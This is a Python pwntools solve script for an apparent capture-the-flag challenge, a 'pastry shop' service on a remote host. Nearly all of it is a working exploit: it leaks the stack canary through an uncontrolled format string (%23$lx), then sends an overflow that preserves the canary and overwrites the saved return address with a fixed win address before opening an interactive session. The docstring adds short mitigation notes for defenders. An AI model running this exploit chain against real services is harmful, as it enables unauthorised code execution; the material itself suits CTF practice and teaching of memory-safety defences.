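#!/usr/bin/env python3
"""Solve script: format-string canary leak chained into a return-address overwrite.

Two weaknesses in the remote service are used together:

1. An uncontrolled format string on the first prompt: the input is echoed
   through a printf-style call, so ``%<N>$lx`` reads the N-th positional
   argument from the stack.  ``CANARY_IDX`` is the position where the stack
   canary of the vulnerable frame was found.
2. A stack buffer overflow on the second prompt: with the canary known, the
   overflow can rewrite the saved return address with ``win_addr`` while the
   canary check still passes.

Mitigation notes for the defender: refusing to pass user data as a format
string (and building with ``-Wformat-security`` / ``_FORTIFY_SOURCE``) removes
step 1, and without the leak the canary alone defeats step 2.  The fixed
``win_addr`` only makes sense if the target is not position-independent
(inferred from the constant, not verified here).
"""
from pwn import *

# elf = context.binary = ELF('./pastry_shop', checksec=False)

# Stack probed with %lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx: the canary is positional
# argument 23 of the format string.
CANARY_IDX = 23

# Bytes from the start of the overflowed buffer up to the canary.
OFFSET_TO_CANARY = 72

# Bytes from the start of the overflowed buffer up to the saved return address.
OFFSET_TO_RIP = 88

# Size of one stack slot (canary, saved frame pointer, return address) on x86-64.
WORD_SIZE = 8

# Address the overwritten return address jumps to.
win_addr = 0x00000000004012C2

HOST, PORT = "offsec.m0lecon.it", 13538


def leak_canary(p):
    """Read the stack canary through the format-string weakness.

    Args:
        p: connected pwntools tube, positioned before the first prompt.

    Returns:
        The canary as an int.

    Raises:
        ValueError: the reply to the probe is not a hex number (for example the
            prompt changed or the stack index is off), instead of the bare
            ``int()`` failure that would otherwise surface.
    """
    p.recvuntil(b"dear customer?\n")
    p.sendline(f"%{CANARY_IDX}$lx".encode())
    leak = p.recvline().strip()
    try:
        canary = int(leak, 16)
    except ValueError as exc:
        raise ValueError(f"unexpected reply to the format-string probe: {leak!r}") from exc
    log.info(f"canary = {canary:#x}")
    return canary


def build_payload(canary):
    """Build the overflow that keeps the canary intact and redirects the return address.

    Layout, from the start of the buffer: filler up to the canary, the leaked
    canary in place, filler for the slot between canary and return address
    (presumably the saved frame pointer), then ``win_addr``.

    Args:
        canary: value returned by :func:`leak_canary`.

    Returns:
        The payload bytes.
    """
    # OFFSET_TO_RIP counts from the buffer start, so subtract what is already
    # written (filler + canary) to get the gap that remains before RIP.
    gap_after_canary = OFFSET_TO_RIP - OFFSET_TO_CANARY - WORD_SIZE
    return flat(
        b"A" * OFFSET_TO_CANARY,
        p64(canary),
        b"B" * gap_after_canary,
        p64(win_addr),
    )


def main():
    """Connect, leak the canary, deliver the overflow and hand over the session."""
    # p = process(elf.path)
    p = remote(HOST, PORT)
    canary = leak_canary(p)
    p.recvuntil(b"to order?\n")
    # send(), not sendline(): the original payload carries no trailing newline.
    p.send(build_payload(canary))
    p.interactive()


if __name__ == "__main__":
    main()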